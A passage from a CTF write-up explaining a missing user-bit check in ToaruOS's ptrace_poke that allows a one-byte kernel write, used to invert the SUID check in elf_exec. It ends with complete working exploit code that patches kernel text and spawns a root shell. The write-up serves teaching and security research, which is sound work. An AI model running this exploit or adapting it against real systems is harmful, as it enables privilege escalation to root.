Next, it gets the page table entry of the provided address 'addr' in
the 'tracee' process.

The reason 'ptr_validate()' isn't used for 'addr' is that the address
is not a pointer to memory in the currently running process, but instead
in the 'tracee'.

If there is no corresponding entry we exit with '-EFAULT'.
If there is an entry we check if it is user readable and if not we
error out as well. The check is implemented in a macro.

    #define mmu_page_is_user_readable(p) (p->bits.user)


It checks if the user bit on the page is set. What that means is that
we could just read the page from ring 3, so we can not access anything
new this way.
This all seems sensible, so let's move on.

--[ 4.5 - Poking the first hole


Taking a look at 'ptrace_poke()' it is very similar to 'ptrace_peek()'.

    long ptrace_poke(pid_t pid, void * addr, void * data) {
        if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
        process_t * tracee = process_from_pid(pid);
        if (!tracee 
        || (tracee->tracer != this_core->current_process->id) 
        || !(tracee->flags & PROC_FLAG_SUSPENDED)) return -ESRCH;

        union PML * page_entry = mmu_get_page_other(
            tracee->thread.page_directory->directory, (uintptr_t)addr);

        if (!page_entry) return -EFAULT;
        if (!mmu_page_is_user_writable(page_entry)) return -EFAULT;


The only difference is that we check if the page is user writable now
instead of readable, which seems sensible.

But looking at the macro there's a glaring omission:

    #define mmu_page_is_user_writable(p) (p->bits.writable)


It does check if the writable bit is set, but it does NOT check for the
user bit.
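
The difference is easier to see side by side. The sketch below uses a
cut-down stand-in for 'union PML' (an assumption; the real definition has
many more fields) and adds a hypothetical fixed variant of the macro that
also tests the user bit.

```c
/* Simplified stand-in for the kernel's page table entry (assumption). */
union PML {
    struct {
        unsigned int present  : 1;
        unsigned int writable : 1;
        unsigned int user     : 1;
    } bits;
    unsigned long raw;
};

/* The macro as quoted above: only the R/W bit is consulted. */
#define mmu_page_is_user_writable(p) (p->bits.writable)

/* Hypothetical fixed variant: require both the U/S and the R/W bit. */
#define mmu_page_is_user_writable_fixed(p) \
    ((p)->bits.user && (p)->bits.writable)
```

For an entry describing a kernel page (writable set, user clear) the
original macro evaluates to 1, while the fixed variant evaluates to 0.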

--[ 4.6 - Flat mapping excursion


Feel free to skip this section, it just clarifies some details about
the way the write into another process works and is a little more
verbose than the rest of the article.

On x86 there is only one page table at a given time (per CPU).
Generally that page table is the one of the address space of the
currently running process.

But 'ptrace_poke' wants to write to a virtual address in the address
space of a different process. You might have noticed earlier that the
function that looks up the page table entry is called
'mmu_get_page_other()'.

The 'page_entry' that the function returns describes a physical page that
is very likely not currently mapped anywhere in the address space of the
current process.

Looking at the rest of the ptrace_poke() function will help make things
clearer.

    uintptr_t mapped_address = 
    mmu_map_to_physical(tracee->thread.page_directory->directory,
    (uintptr_t)addr);

    if ((intptr_t)mapped_address < 0 && (intptr_t)mapped_address > -10) 
        return -EFAULT;


'mapped_address' is assigned the physical address that the virtual
address 'addr' is mapped to in the 'tracee'.

In order for a kernel to not have to constantly map and unmap pages it
is common to instead keep a flat virtual mapping of all physical memory
at some fixed offset, so that subtracting the offset from a virtual
address in that region yields the physical address it maps.

In ToaruOS that offset is:

    #define HIGH_MAP_REGION   0xffffff8000000000UL

    void * mmu_map_from_physical(uintptr_t frameaddress) {
        return (void*)(frameaddress | HIGH_MAP_REGION);
    }


This flat mapping is writable because the kernel is responsible for
performing access checks and because it cannot know ahead of time if a
given physical address may need to be written to in the future.
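
The address arithmetic of such a flat mapping can be sketched in a few
lines. 'flat_from_physical()' mirrors the OR from
'mmu_map_from_physical()' above; 'physical_from_flat()' is a
hypothetical inverse added only for illustration. The constant is
written with a ULL suffix here so the sketch also builds where 'long'
is 32 bits wide.

```c
#include <stdint.h>

#define HIGH_MAP_REGION 0xffffff8000000000ULL

/* Physical -> flat-map virtual address, the same OR as in the article. */
static uint64_t flat_from_physical(uint64_t phys) {
    return phys | HIGH_MAP_REGION;
}

/* Inverse direction (hypothetical helper, not from ToaruOS): strip the
 * offset again. This is only valid while phys stays below 2^39, so
 * that the OR above never overlaps the bits of the offset. */
static uint64_t physical_from_flat(uint64_t virt) {
    return virt & ~HIGH_MAP_REGION;
}
```

With these definitions the physical address 0x1000 shows up at
0xffffff8000001000 in the flat mapping, and converting that back gives
0x1000 again.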

Finally here is the rest of 'ptrace_poke()'.

    uintptr_t blarg = (uintptr_t)mmu_map_from_physical(mapped_address);
    *(char*)blarg = *(char*)data;
    return 0;


'blarg' becomes the pointer into the flat mapping which is writable and
'data' is written to it.

As mentioned earlier, the access flags of a memory page are a property
of the virtual mapping and not of the page itself.
That is why 'mmu_page_is_user_writable()' needs to be explicitly
checked by the kernel instead of just attempting to write and seeing if
it fails.

—[ 5 - The bug


Why is that a problem and what can we do with it?

On first thought it may seem useless. The page probably doesn't have
the user bit set anyway, so we still can't write to it from user mode.

But during a syscall we aren't in user mode. The kernel handles
syscalls in ring 0 and it is allowed to access non-user pages.

'ptrace()' is exactly such a syscall, which means that if we provide a
valid kernel address and it is writable the write will succeed.

Luckily, the mapping of the kernel itself is read/write/execute.
I suspect this is because it is a LOT simpler to set it up that way
before remapping the kernel to a high address.

This means that for any address in the kernel itself we will pass the
'mmu_page_is_user_writable()' check.

So this bug gives us a very nice one byte write-what-where primitive.
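
The whole flow can be replayed in a toy model. Everything below is
made up for illustration (a 16 byte page size, a four entry table and
the names 'toy_pte', 'toy_table', 'toy_phys' and 'toy_poke'); it only
mimics the order of the steps in 'ptrace_poke()': look up the entry,
run the permission check, then write through the flat mapping.

```c
#include <stdint.h>
#include <stddef.h>

#define PAGE_SIZE 16u          /* toy page size, not 4096 */
#define NPAGES    4u

struct toy_pte { unsigned present:1, writable:1, user:1; unsigned frame; };

static uint8_t toy_phys[NPAGES * PAGE_SIZE];   /* "physical memory" */

/* Toy address space: page 0 is a kernel page (writable, no user bit),
 * page 1 is a user page. Pages 2 and 3 are left unmapped. */
static struct toy_pte toy_table[NPAGES] = {
    { .present = 1, .writable = 1, .user = 0, .frame = 0 },
    { .present = 1, .writable = 1, .user = 1, .frame = 1 },
};

/* One-byte poke in the style of ptrace_poke(). The toy_phys array
 * plays the role of the flat mapping. check_user selects the behaviour
 * a fixed check would have. Returns 0 on success and -1 if the write
 * is refused. */
static int toy_poke(uintptr_t addr, uint8_t value, int check_user) {
    size_t page = addr / PAGE_SIZE;
    if (page >= NPAGES || !toy_table[page].present) return -1;
    if (!toy_table[page].writable) return -1;
    if (check_user && !toy_table[page].user) return -1;
    toy_phys[toy_table[page].frame * PAGE_SIZE + addr % PAGE_SIZE] = value;
    return 0;
}
```

With 'check_user' set to 0, as in the vulnerable code, a poke to an
address in page 0 succeeds even though that page has no user bit. With
'check_user' set to 1 the same poke is refused.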

—[ 6 - Write-what-where, but where?


Ideally we would like to just overwrite our own process's uid to be 0
to become root.

Unfortunately for us, the check in 'ptrace_peek()' is correct. So,
while we can write in the kernel, we can't read anything anywhere in it.

—[ 6.1 - No KASLR


ToaruOS doesn't have KASLR, so we know exactly where in memory the
kernel is ahead of time. But what does that gain us?

We could try to overwrite a global pointer, for example the one to the
current process, and point it into our user space memory at a fake data
structure.
This would probably work since ToaruOS doesn't have SMAP.

We could overwrite the address of an interrupt handler or a syscall or
some other function pointer and redirect it so that we can run our own
code in ring 0.
This, too, would probably work since ToaruOS doesn't have SMEP.

But both of these strategies require some extra effort in faking a data
structure or writing C code that works properly in ring 0.

—[ 6.2 - SUIDn’t


The exploit strategy I ended up using was a lot simpler to implement.

We can alter kernel memory anywhere, even the .text section and we know
where everything is since there's no KASLR.

Remember the SUID check in 'elf_exec' that I talked about in 5.3?
Because we know the exact version of the kernel, we can simply look at
the kernel image or read /proc/kallsyms in our local instance to find
out at which address in virtual memory that function is.

    local@livecd ~$ sudo cat /proc/kallsyms | grep elf_exec
    000000000010f300 elf_exec
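
If you would rather do the lookup from a program than with grep, a
small parser is enough. This is only a sketch: it assumes every line
has the "<hex address> <name>" shape of the output above, and
'kallsyms_match()' is a made-up helper, not part of any ToaruOS
library.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Parse one "<hex address> <name>" line. Returns 1 and stores the
 * address if the line describes exactly the symbol 'wanted', and 0
 * otherwise (other symbol or malformed line). */
static int kallsyms_match(const char *line, const char *wanted,
                          uint64_t *addr_out) {
    unsigned long long addr;
    char name[128];
    if (sscanf(line, "%llx %127s", &addr, name) != 2) return 0;
    if (strcmp(name, wanted) != 0) return 0;
    *addr_out = addr;
    return 1;
}
```

Unlike grep this matches the full symbol name only. Fed the line above
it yields 0x10f300 for 'elf_exec', which puts the instruction at
0x10f365 that we are about to look at 0x65 bytes into the function.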


Disassembling the function with 'objdump' we can find the exact jump
instruction that implements the if statement for SUID binaries.

It is compiled to a 'jne' (jump if not equal) conditional jump
instruction that skips past the uid assignment if the binary isn't
SUID.

        10f365: 0f 85 48 01 00 00       jne    0x10f4b3


To turn 'jne' into 'je' we just need to flip the second opcode byte
from 0x85 to 0x84.

        10f365: 0f 84 48 01 00 00       je    0x10f4b3


This negates the check so that now only non-SUID binaries are assigned
their owner's uid.
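
The encoding details behind the patch can be checked with a short
sketch. Both helper names are made up. The facts they rely on are
general x86 ones: a near conditional jump is encoded as 0F 80..8F
followed by a 32-bit little-endian displacement, the lowest bit of the
second opcode byte selects between a condition and its negation, and
the displacement is relative to the end of the 6 byte instruction.

```c
#include <stdint.h>
#include <stddef.h>

/* Invert a near conditional jump in place, so that for example
 * 0F 85 (jne) becomes 0F 84 (je) and vice versa.
 * Returns the offset of the byte that changed, or -1 if 'insn' is not
 * a near Jcc. */
static int invert_near_jcc(uint8_t *insn, size_t len) {
    if (len < 6 || insn[0] != 0x0f || (insn[1] & 0xf0) != 0x80) return -1;
    insn[1] ^= 0x01;
    return 1;
}

/* Target of a near Jcc located at 'addr': the address of the next
 * instruction (addr + 6) plus the signed displacement. */
static uint64_t near_jcc_target(uint64_t addr, const uint8_t *insn) {
    uint32_t raw = (uint32_t)insn[2] | (uint32_t)insn[3] << 8 |
                   (uint32_t)insn[4] << 16 | (uint32_t)insn[5] << 24;
    return addr + 6 + (uint64_t)(int64_t)(int32_t)raw;
}
```

For the bytes 0f 85 48 01 00 00 at 0x10f365 the target works out to
0x10f365 + 6 + 0x148 = 0x10f4b3, matching the disassembly. Only the
byte at offset 1 changes, which is why a single one-byte write to
0x10f365+1 is enough.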

Afterwards, simply running '/bin/esh' turns you into root and you can
read the flag.

—[ 7 - In Closing


I hope this article can help some curious people get started in the
kernel security space. If nothing else maybe it can give somebody an
appreciation for it.

I also hope it doesn't seem like I am disparaging ToaruOS in any way.
I really like the project. Security is not its main focus and still it
is likely more stable and secure than many other hobby OSes.
Kernel security is very very hard and even harder on defense.

Kernel security has many pitfalls, both because the kernel is the core
of what protects everything on any OS and because there are many low
level details that we usually have the luxury of ignoring in user
space.

I want to thank the HXP team for the fun CTF they hosted and my friends
who I forced to proof-read for me. In particular Lukas Ratz, who
motivated me to participate in the first place.

—[ A - Exploit Code

#include <stdio.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <string.h>
#include <signal.h>
#include <ctype.h>
#include <sys/wait.h>
#include <sys/signal.h>
#include <sys/signal_defs.h>
#include <syscall_nums.h>

int main(int argc, char** argv)
{
    printf("[+] Starting exploit\n");
    pid_t c_pid = fork();
    if(c_pid<0)
    {
        printf("[-] Couldn't fork\n");
        return -1;
    }
    // Child
    if(c_pid==0)
    {
        //attaching debugger so we can ptrace_poke
        if(ptrace(PTRACE_TRACEME,0,NULL,NULL))
        {
            return -1;
        }
        signal(SIGINT, SIG_IGN);
        return 0;
    }
    int status = 0;
    waitpid(c_pid, &status, WSTOPPED);
    printf("[+] Child stopped as expected\n");
    printf("[+] Replacing suid check\n");
    char data[4];
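    //second opcode byte of je (0x84), replacing that of jne (0x85)
    data[0] = 0x84;
    //address of the jne after the compare in elf_exec's suid check,
    //plus one to skip the leading 0x0f opcode byte
    void* target = (void*)(0x0010f365+1);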
    int ret = ptrace(PTRACE_POKEDATA, c_pid, target, &data[0]);
    if(ret<0)
    {
        perror("ptrace");
        return -1;
    }
    printf("[+] Should have broken check, get root shell\n");
    char *n_argv[] = {"/bin/esh",NULL};
    execve("/bin/esh", n_argv,NULL);
    //only reached if execve failed
    perror("execve");
    return -1;
}


|=[ EOF ]=---------------------------------------------------------------=|
